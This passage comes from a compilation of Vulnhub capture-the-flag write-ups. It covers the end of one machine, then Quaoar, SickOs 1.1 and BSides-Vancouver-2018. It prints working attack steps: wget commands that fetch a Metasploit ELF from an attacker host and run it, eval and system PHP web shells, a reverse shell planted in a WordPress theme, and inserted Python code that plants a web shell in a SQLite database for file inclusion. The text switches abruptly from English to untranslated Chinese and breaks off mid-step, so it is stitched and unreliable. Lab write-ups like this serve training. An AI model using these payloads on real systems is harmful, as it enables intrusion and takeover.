src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307919687573.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then start a simple web server with Python on the port the download commands below use: <code>python -m SimpleHTTPServer 9999</code></p><p>Now use the one-liner obtained earlier to run commands that download and execute the payload.</p><p>Download the payload: <code>x=system('wget http://192.168.1.4:9999/msf.elf');</code></p><p>A following <code>x=system('ls');</code> shows the file was not saved, presumably because the web user cannot write to the current directory. So download straight into <code>/tmp</code> instead:</p><p><code>x=system('wget http://192.168.1.4:9999/msf.elf -O /tmp/msf.elf');</code></p><p>Check it:
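The first download above failed silently because www-data cannot write to the directory the web shell runs in, and the writeup falls back to /tmp; the review at the end of this section shows that several other directories under /var/www were in fact world-writable. Rather than guessing, enumerate what the web user can write to. The following Python helper is an added example, not code from the writeup: it decides writability from mode bits and ownership for a chosen uid/gid (the same rule the kernel applies: only the first matching class of owner, group, other counts, and creating a file needs both write and search permission), and demo() builds a constructed tree (a 755 document root, a 755 html/ and a 777 images/) instead of touching a real /var/www. The uid standing in for www-data is an assumption: any uid that does not own the tree.

```python
import os
import stat
import tempfile


def writable_by(st, uid, gid, groups=()):
    """Decide from the stat result alone whether user (uid, gid, groups)
    could create a file in this directory. Only the bits of the first
    matching class (owner, then group, then other) apply, and a new file
    needs both write and search (execute) permission on the directory."""
    if uid == 0:
        return True
    mode = st.st_mode
    if st.st_uid == uid:
        need = stat.S_IWUSR | stat.S_IXUSR
    elif st.st_gid == gid or st.st_gid in groups:
        need = stat.S_IWGRP | stat.S_IXGRP
    else:
        need = stat.S_IWOTH | stat.S_IXOTH
    return mode & need == need


def writable_dirs(root, uid, gid, groups=()):
    """Walk root (without following symlinks) and return, sorted, every
    directory that (uid, gid, groups) could drop a file into."""
    found = []
    for dirpath, _dirnames, _files in os.walk(root):
        try:
            st = os.lstat(dirpath)
        except OSError:
            continue  # unreadable or vanished: skip rather than abort the walk
        if writable_by(st, uid, gid, groups):
            found.append(dirpath)
    return sorted(found)


def demo():
    """Constructed stand-in for the target's tree (not the real /var/www):
    a 755 document root, a 755 html/ directory and a 777 images/ directory,
    all owned by the current user. The uid playing www-data is an
    assumption: any uid that does not own the tree, so only the 'other'
    bits apply to it. Returns the writable directories relative to the
    temporary base."""
    base = tempfile.mkdtemp()
    www = os.path.join(base, "www")
    os.makedirs(os.path.join(www, "html"))
    os.makedirs(os.path.join(www, "images"))
    os.chmod(www, 0o755)
    os.chmod(os.path.join(www, "html"), 0o755)
    os.chmod(os.path.join(www, "images"), 0o777)
    not_owner = os.getuid() + 1
    return [os.path.relpath(d, base) for d in writable_dirs(www, not_owner, not_owner)]


if __name__ == "__main__":
    print(demo())  # ['www/images']
```

On the target itself the same question is answered faster with `find /var/www -type d -writable` from the web shell, but that only tells you about the user the shell runs as; the mode-bit version above lets you reason about any account, for example before trying a su to a user whose password was recovered from the database.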
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307925456818.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Then make it executable and run it.</p><pre class="md-fences md-end-block" lang="">x=system('chmod +x /tmp/msf.elf');
x=system('/tmp/msf.elf');</pre><p>The result:
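The web shell used throughout this section was obtained in step 3 by storing PHP text as a row in a SQLite database through phpLiteAdmin and then pulling the database file in through view.php?page=. That works because include() executes whatever sits between <?php and ?> and simply echoes the binary page data around it, as long as the PHP text is stored contiguously in the file. The following Python is an added example, not code from the writeup: it plants a one-liner the way phpLiteAdmin's insert form does and checks in the raw file bytes that the tag pair survived. The database file name, the eval one-liner and the base URL are assumptions for the demo; the table and column names are the ones used in the ATTACH attempt above.

```python
import os
import sqlite3
import tempfile

# Constructed one-liner. The commands used later in this section
# (x=system('...')) imply a shell of this shape, taking its code from x.
PAYLOAD = "<?php eval($_REQUEST['x']); ?>"


def plant_payload(db_path, payload=PAYLOAD, table="exp", column="dataz"):
    """Do what phpLiteAdmin's insert form does: store the PHP text as an
    ordinary TEXT cell. Returns the row count afterwards."""
    con = sqlite3.connect(db_path)
    try:
        con.execute(f"CREATE TABLE IF NOT EXISTS {table} ({column} TEXT)")
        con.execute(f"INSERT INTO {table} ({column}) VALUES (?)", (payload,))
        con.commit()
        return con.execute(f"SELECT COUNT(*) FROM {table}").fetchone()[0]
    finally:
        con.close()


def payload_intact(db_path, payload=PAYLOAD):
    """True if the PHP text sits unbroken in the raw file. A short TEXT cell
    is stored inline in one b-tree page, so include() meets the open and
    close tags in sequence; a cell longer than the page size is split over
    overflow pages and the bytes between pages would land in the middle of
    the PHP code."""
    with open(db_path, "rb") as fh:
        raw = fh.read()
    return raw.startswith(b"SQLite format 3\x00") and payload.encode() in raw


def include_url(base, db_path):
    """The request that makes PHP execute the database file through the
    view.php?page= parameter seen on the target."""
    return f"{base}/view.php?page={db_path}"


def demo():
    """Plant the one-liner in a throwaway database and verify it survived."""
    db = os.path.join(tempfile.mkdtemp(), "shell.db")
    rows = plant_payload(db)
    return rows, payload_intact(db)


if __name__ == "__main__":
    print(demo())  # (1, True)
    print(include_url("http://192.168.1.3", "/usr/databases/shell.db"))
```

Keep the stored text short and free of a second `<?php`: everything before the first open tag and after the close tag is echoed verbatim, which is harmless, but a payload that straddles a page boundary stops parsing.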
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926464521.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9401' class='md-header-anchor '></a>Privilege escalation</h2><p>The basic approach to Linux privilege escalation:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9408' class='md-header-anchor '></a>1. Escalation with msf</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>No usable escalation exploit is found.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307944129988.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9417' class='md-header-anchor '></a>2. Kernel exploit</h3><p>With a Meterpreter shell on the target, take a quick look at the system information.
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307926898597.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The system is <code>Ubuntu 12.04 (Linux 3.2.0-23-generic)</code>. Search <code>www.exploit-db.com</code> for a matching exploit.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928156767.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The second exploit in the results is used: <code>https://www.exploit-db.com/exploits/33589/</code>. (Check that the exploit matches the target's architecture before compiling; the previous machine's attempt failed because the exploit was 64-bit only.)</p><p>Usage:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307928690163.jpg' alt='' referrerPolicy='no-referrer' /></p><p>First write the C source onto the target from the Meterpreter shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307929385748.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Drop into a shell and spawn a proper tty with Python.
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>Then compile and run the exploit.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931869735.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9443' class='md-header-anchor '></a>Getting the flag</h2><p>A <code>flag.txt</code> file is found in root's home directory:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307931748150.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9447' class='md-header-anchor '></a>Review of the approach</h2><p>With the final objective reached, look back at the points that failed along the way.</p><h3><a name='header-n9450' class='md-header-anchor '></a>1. Why writing a shell through phpLiteAdmin failed</h3><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307932678504.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The site's document root is <code>/var/www</code>, not <code>/var/www/html</code>, and the permissions on <code>www</code> itself do not let the web user write a shell there directly.</p><p>The other directories under <code>/var/www/</code>, however, are far too permissive, and a shell can be written into them directly.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307933864994.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9459' class='md-header-anchor '></a>2. Writing a shell through phpLiteAdmin, second attempt</h3><p>Knowing the site's absolute path, and that the other folders under it have bad permissions, try writing the shell again:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307936953989.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Written successfully:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307937353945.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9472' class='md-header-anchor '></a>Summary of the approach</h2><p>Breakthrough points:</p><ol start='' ><li>Weak phpLiteAdmin login password</li><li>Writing a one-line web shell into the database file through phpLiteAdmin</li><li>Getting a shell by combining the LFI with the database file</li><li>Generating a payload with MSF, finding a writable directory through the one-liner, then planting and running it</li><li>Escalating to root through a kernel vulnerability</li></ol><p>There is room for other approaches along the way, for example:</p><ol start='' ><li>With the file inclusion vulnerability, fuzz for configuration and log files with a wordlist, for instance to get a shell by including the SSH log.</li><li>Fuzz the site's absolute path and write a shell with phpLiteAdmin.</li></ol><p>Overall this target is quite interesting: it tests basic web vulnerabilities and their combination with phpLiteAdmin, as well as knowledge of directory permissions. It can be finished in several ways, which makes it fun to play.</p><h1><a name='header-n9507' class='md-header-anchor '></a>Section 10: Quaoar</h1><h2><a name='header-n9508' class='md-header-anchor 
'></a>Target information</h2><h3><a name='header-n9509' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/hackfest2016/Quaoar.ova' target='_blank' class='url'>https://download.vulnhub.com/hackfest2016/Quaoar.ova</a></p><h3><a name='header-n9512' class='md-header-anchor '></a>Environment</h3><ul><li>The target is provided as an OVA image and the author recommends VirtualBox; download it from Vulnhub and import it into VirtualBox to run it.</li><li>Target: set the VM's network adapter to bridged mode.</li><li>Attacker: a Kali VM, also in bridged mode, can then reach the target.</li></ul><h3><a name='header-n9523' class='md-header-anchor '></a>Target description</h3><p>Difficulty: beginner.</p><p>Objective: get into the machine, find the flags and obtain root.</p><p>Tools recommended by the author: <code>nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra</code></p><h2><a name='header-n9530' class='md-header-anchor '></a>Information gathering</h2><ul><li><p>Finding the IP</p><p>First check Kali's network configuration.
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/1.JPG' alt='' referrerPolicy='no-referrer' /></p><p>The target VM prints its own IP address on its console</p></li></ul><p>   <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/2.JPG' alt='' referrerPolicy='no-referrer' /></p><ul><li><p>Port scanning and service identification</p><p>With the target IP confirmed, probe it in more detail with Nmap (the address is the one shown on the console and used by every command below):
<code>nmap -A -v 172.19.0.182 -oN nmap.txt</code></p><p>The parameters:</p><ul><li><code>-A</code> aggressive scan: OS detection, version detection, the default script set and traceroute, to gather as much as possible;</li><li><code>-v</code> verbose output while scanning;</li><li><code>-oN</code> write the results as plain text to <code>nmap.txt</code>.
The result:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/3.JPG' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>Threat modeling</p><p>The nmap results show that the target has ports <code>22</code> and <code>80</code> open and runs <code>Linux</code>. Port <code>22</code> is <code>SSH</code>; port <code>80</code> is <code>http</code>, served by <code>Apache/2.2.22</code>.</p><p>Web applications usually have all sorts of problems, so after this first look the web service is chosen as the initial entry point.</p></li></ul><h2><a name='header-n9573' class='md-header-anchor '></a>Web vulnerability discovery</h2><h3><a name='header-n9575' class='md-header-anchor '></a>1. Scanning the site's directories with dirb</h3><p><code>dirb http://172.19.0.182</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/4.JPG' alt='' referrerPolicy='no-referrer' /></p><p>This finds robots.txt, an upload directory and a wordpress directory.</p><p>robots.txt also points at the wordpress directory</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/5.JPG' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9586' class='md-header-anchor '></a>2. Weak password</h3><p>Scan with wpscan</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;">wpscan -u http://172.19.0.182/wordpress --wp-content-dir wp-content --enumerate u

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Fri Jul  6 22:13:24 2018
[+] Requests Done: 62
[+] Memory used: 63.867 MB
[+] Elapsed time: 00:00:05
</pre><p>The weak password <code>admin / admin</code> gets us in.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/6.JPG' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9599' class='md-header-anchor '></a>Getting a web shell</h2><h3><a name='header-n9600' class='md-header-anchor '></a>1. Getting a shell by editing a theme file</h3><p><code>cp /usr/share/webshells/php/php-reverse-shell.php shelly.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/7.JPG' alt='' referrerPolicy='no-referrer' /></p><p>Edit the shell (listener IP and port), put it into the WordPress theme where a request for a missing page executes it (the 404 template), start an NC listener locally and request a page that does not exist; the shell connects back</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/8.JPG' alt='' referrerPolicy='no-referrer' /></p><p>Upgrade to a proper tty with Python</p><p><code>python -c 'import pty; pty.spawn("/bin/bash")'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/9.JPG' alt='' referrerPolicy='no-referrer' /></p><p>With these privileges the first flag can be read</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/10.JPG' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9622' class='md-header-anchor '></a>Privilege escalation</h2><h3><a name='header-n9623' class='md-header-anchor '></a>1. Checking application passwords for reuse</h3><p>Look at the WordPress configuration file</p><p>It contains the database root account and its password</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/11.JPG' alt='' referrerPolicy='no-referrer' /></p><p>The same password is reused for the system root account, which gives root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/12.JPG' alt='' referrerPolicy='no-referrer' /></p><p>And the other flag is read</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/12/_image/13.JPG' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n9642' class='md-header-anchor '></a>Section 11: SickOs 1.1</h1><h2><a name='header-n9643' class='md-header-anchor '></a>Target information</h2><h3><a name='header-n9644' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/sickos/sick0s1.1.7z' target='_blank' class='url'>https://download.vulnhub.com/sickos/sick0s1.1.7z</a></p><h3><a name='header-n9647' class='md-header-anchor '></a>Environment</h3><ul><li>The target is provided as an OVF image and the author recommends VMware Workstation; download it from Vulnhub and import it into VMware Workstation to run it.</li><li>Target: NAT, IP obtained automatically.</li><li>Attacker: NAT, IP obtained automatically: 192.168.202.128.</li></ul><h3><a name='header-n9658' class='md-header-anchor '></a>Target description</h3><p>The goal is to obtain root and read the file /root/a0216ea4d51874464078c618298b1367.txt.</p><h2><a name='header-n9661' class='md-header-anchor '></a>Information gathering</h2><ul><li>Finding the IP</li></ul><p>The target sits on the 192.168.202.0/24 segment; an nmap scan finds its IP: 192.168.202.133.
<img src='https://i.imgur.com/Sa8He6D.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port scanning and service identification
A full port scan of that IP:</li></ul><p><img src='https://i.imgur.com/J4QyA5e.png' alt='' referrerPolicy='no-referrer' /></p><p>A Squid proxy is running. Configure the browser to use it as an HTTP proxy and open <a href='http://192.168.202.133/' target='_blank' class='url'>http://192.168.202.133/</a>:
<img src='https://i.imgur.com/TgWO3gi.png' alt='' referrerPolicy='no-referrer' />
So the initial finding is that the web application on the target is reached, and has to be attacked, through the proxy.</p><h2><a name='header-n9680' class='md-header-anchor '></a>Web vulnerability discovery</h2><p>Brute-force directories with the proxy configured:
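Everything from here on goes through Squid, so every tool has to be told about the proxy (dirb and DirBuster both take a proxy setting; Burp can chain to an upstream proxy). The following Python is an added example, not from the writeup: a minimal dirb-style probe whose fetch function routes every request through an HTTP proxy with urllib, written so that the probing logic can be exercised without a network by passing in any fetch(url) -> status function. The proxy port 3128 (Squid's default) and the tiny wordlist are assumptions for the demo.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Assumptions for the demo: Squid on its default port 3128 on the target,
# and a tiny wordlist standing in for dirb's common.txt.
PROXY = "http://192.168.202.133:3128"
WORDS = ["robots.txt", "wolfcms/", "cgi-bin/", "admin/", "backup/"]


def make_proxy_fetch(proxy_url):
    """Build fetch(url) -> HTTP status code (None on connection failure)
    that routes every request through the given HTTP proxy. Squid forwards
    to the origin, so the status codes are the web server's own; an origin
    that Squid cannot reach shows up as a 5xx generated by Squid."""
    handler = urllib.request.ProxyHandler({"http": proxy_url})
    opener = urllib.request.build_opener(handler)

    def fetch(url):
        try:
            with opener.open(url, timeout=5) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code          # 403, 404 ... are answers, not errors
        except urllib.error.URLError:
            return None

    return fetch


def brute_dirs(base, words, fetch, hit=(200, 204, 301, 302, 401, 403)):
    """dirb-style probe: one request per word, keep those whose status is
    in hit. 403 is kept on purpose: a forbidden listing (cgi-bin/) still
    proves the directory exists. Returns [(word, status), ...]."""
    base = base if base.endswith("/") else base + "/"
    found = []
    for word in words:
        status = fetch(urljoin(base, word))
        if status in hit:
            found.append((word, status))
    return found


if __name__ == "__main__":
    for word, status in brute_dirs("http://192.168.202.133", WORDS, make_proxy_fetch(PROXY)):
        print(status, word)
```

The same `make_proxy_fetch` opener works for any follow-up request to the target, which matters here because nothing on port 80 answers directly.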
<img src='https://i.imgur.com/ECYErtb.png' alt='' referrerPolicy='no-referrer' /></p><p>Open robots.txt:
<img src='https://i.imgur.com/540LyET.png' alt='' referrerPolicy='no-referrer' /></p><p>It is WolfCMS. The front end is only static pages with nothing to exploit.
<img src='https://i.imgur.com/8SFGttD.png' alt='' referrerPolicy='no-referrer' /></p><p>The default address <a href='http://192.168.202.133/wolfcms/?/admin/' target='_blank' class='url'>http://192.168.202.133/wolfcms/?/admin/</a> leads to the admin back end:
<img src='https://i.imgur.com/qcutT1t.png' alt='' referrerPolicy='no-referrer' /></p><p>The weak password admin/admin gets into the back end. The banner shows a CMS version below 0.8.3.1, which may have a file upload vulnerability:
<img src='https://i.imgur.com/9E9RE38.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9696' class='md-header-anchor '></a>Getting a web shell</h2><h3><a name='header-n9697' class='md-header-anchor '></a>Approach 1</h3><p>The back end accepts uploads with any extension, so upload a full-featured PHP shell to get a web shell:
<img src='https://i.imgur.com/jfLyKEn.png' alt='' referrerPolicy='no-referrer' /></p><p>Reading the target file directly gives no output because of insufficient permissions:
<img src='https://i.imgur.com/QfC7XrW.png' alt='' referrerPolicy='no-referrer' /></p><p>Checking open ports shows 3306 listening, but the MySQL version is above 5.1, where the UDF library must live in the server's plugin_dir, so the classic UDF escalation is not an option here:
<img src='https://i.imgur.com/YIMuln3.png' alt='' referrerPolicy='no-referrer' /></p><p>Use the shell's reverse-connect feature to get a reverse shell:
<img src='https://i.imgur.com/fJFfkXY.png' alt='' referrerPolicy='no-referrer' />
<img src='https://i.imgur.com/YRV0vtL.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9711' class='md-header-anchor '></a>Approach 2</h3><p>The directory scan also found a cgi-bin directory; a quick search shows that the bash environment-variable vulnerability (Shellshock) can give a shell directly through it. Use it to get an nc reverse shell.
<img src='https://i.imgur.com/ySdDGRs.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9715' class='md-header-anchor '></a>Privilege escalation</h2><p>Switching users with su or reading the file with sudo is not permitted:
<img src='https://i.imgur.com/Pr3iY30.png' alt='' referrerPolicy='no-referrer' /></p><p>Go to the directory the site is deployed in:
<img src='https://i.imgur.com/8nWd3GZ.png' alt='' referrerPolicy='no-referrer' /></p><p>There is a configuration file; with luck it stores plaintext credentials:
<img src='https://i.imgur.com/Q24NuxO.png' alt='' referrerPolicy='no-referrer' /></p><p>Connecting to the database with the credentials found fails, and the password does not work for root either.
<img src='https://i.imgur.com/qnjk8X0.png' alt='' referrerPolicy='no-referrer' /></p><p>Looking at the other system users, the sickos account stands out:
<img src='https://i.imgur.com/s3vVfpI.png' alt='' referrerPolicy='no-referrer' /></p><p>Logging in as sickos with the password john@123 succeeds.
<img src='https://i.imgur.com/RDHnQfj.png' alt='' referrerPolicy='no-referrer' /></p><p>sudo命令查看文件:
<img src='https://i.imgur.com/remDsux.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9737' class='md-header-anchor '></a>思路总结</h2><p>1.利用文件上传漏洞或者bash漏洞获取系统shell。</p><p>2.部署的网站可能会存储数据库等明文用户密码,可以加以利用。</p><h1><a name='header-n9742' class='md-header-anchor '></a>第十二节 BSides-Vancouver-2018-Workshop</h1><h2><a name='header-n9743' class='md-header-anchor '></a>靶机信息</h2><h3><a name='header-n9745' class='md-header-anchor '></a>下载链接</h3><p><a href='https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova' target='_blank' class='url'>https://download.vulnhub.com/bsidesvancouver2018/BSides-Vancouver-2018-Workshop.ova</a></p><h3><a name='header-n9748' class='md-header-anchor '></a>靶机说明</h3><p>靶机用ValualBox创建,目标是在其上获得root级访问。</p><h3><a name='header-n9751' class='md-header-anchor '></a>目标</h3><p>Boot to root:获得root权限和Flag。</p><h3><a name='header-n9754' class='md-header-anchor '></a>运行环境</h3><ul><li>靶机:通过ValualBox打开虚拟机,网络连接方式设置为主机模式(host-only),或者将虚拟机、Kali机都桥接到物理机的无线网卡。测试中使用VMWare导入虚机会无法获得IP,使用ValualBox可正常获得IP。</li><li>攻击机:同网段下有Windows攻击机(物理机),安装有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Hydra、Python2.7、DirBuster、AWVS、Nessus等渗透工具。同样可使用Kali Linux作为攻击机,预装了全面的渗透工具。</li></ul><h2><a name='header-n9762' class='md-header-anchor '></a>信息收集</h2><ul><li>IP识别</li></ul><p>启动虚拟机,使用nmap扫描C段IP <code>nmap -sP 192.168.56.0/24</code> 获得虚机IP 192.168.56.101</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口和服务识别</li></ul><p>Nmap命令:<code>nmap -p1-65535 -open -A 192.168.56.101 -oN BSides.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>汇总开放的端口和服务:</p><p>端口          服务       提示信息</p><p>21           FTP        vsftpd2.3.5 允许匿名登录</p><p>22           ssh        OpenSSH 5.9p1</p><p>80           http       Apache httpd 2.2.22 (Ubuntu)</p><h2><a 
name='header-n9790' class='md-header-anchor '></a>漏洞挖掘</h2><ul><li>渗透方法一:</li><li>0x01 匿名登录FTP获得用户</li></ul><p>Windows下使用XFTP匿名登录FTP:在public目录下,找到users.txt.bk文件,用记事本打开:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>获得5个用户名:abatchy,john,mai,anne,doomguy</p><ul><li>0x02 用5个用户名加弱口令字典进行ssh暴破</li></ul><p>Windows下可使用九头蛇Hydra Windows版本或其他工具暴破,这里采用“超级弱口令检查工具V1.0”进行暴破,线程不能开太高,否则虚机会挂,4线程。</p><p>字典的选择,选用字典:darkweb2017-top10000.txt。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>暴破得到用户名:anne   密码:princess</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 登录ssh,具有sudo权限,获得flag </li></ul><p>使用Xshell工具ssh登录账号:anne 密码:princess</p><p>执行id命令和sudo -l命令,发现anne具有sudo权限:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>执行sudo -l /root命令,sudo cat /root/flag.txt命令,获得flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>渗透方法二:</li><li>0x01 环境设置</li></ul><p>因需要用到Kali虚机, 需要调整将bsides虚拟机、Kali攻击机都桥接到笔记本电脑的无线网卡,bsides虚拟机会重新获得新IP。使用Namp扫描无线网卡C段可获得bsides虚机的新IP为:172.20.10.8,Kali虚机的IP是:172.20.10.9。</p><p>Nmap命令:<code>nmap -sP 192.168.56.0/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>同样匿名登录FTP,获得5个用户名:abatchy,john,mai,anne,doomguy</p><ul><li>0x02 访问80端口http服务</li></ul><p>访问 <code>http://172.20.10.8/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>访问 
<code>http://172.20.10.8/robots.txt</code> 发现/backup_wordpress目录:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>访问 <code>http://172.20.10.8/backup_wordpress/</code>进入WordPress页面:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>0x03 使用wpscan扫描WordPress,暴破后台用户名和密码:</li></ul><p>(1)暴破用户名,命令<code>wpscan -u http://172.20.10.8/backup_wordpress --enumerate u</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>获得用户名:admin   john</p><p>(2)使用wpscan默认字典,暴破密码:</p><p><code>wpscan --url wpscan -u http://172.20.10.8/backup_wordpress --wordlist /root/share/darkweb2017-top10000.txt --username john</code></p><p>暴破字典依然使用darkweb2017-top10000.txt弱口令字典:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>暴破成功,获得用户名john 密码enigma</p><h2><a name='header-n9883' class='md-header-anchor '></a>获取shell</h2><ul><li>0x04 登录并反弹shell</li></ul><p>(1)使用用户名 john  密码enigma登录WordPress,登录地址 <code>http://172.20.10.8/backup_wordpress/wp-login.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2)WordPress获取shell的方法有多种,进入<code>Appearance  -> Editor</code>,点击右边的<code>Theme Header</code>,在编辑器里面插入一句话命令执行小马<code><?php system($_GET['cmd']); ?></code>保存。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3)在Burpsuit中通过cmd参数执行命令,访问<code>172.20.10.8/backup_wordpress/?cmd=id;ls</code> 成功执行id和ls命令:</p><p><img 
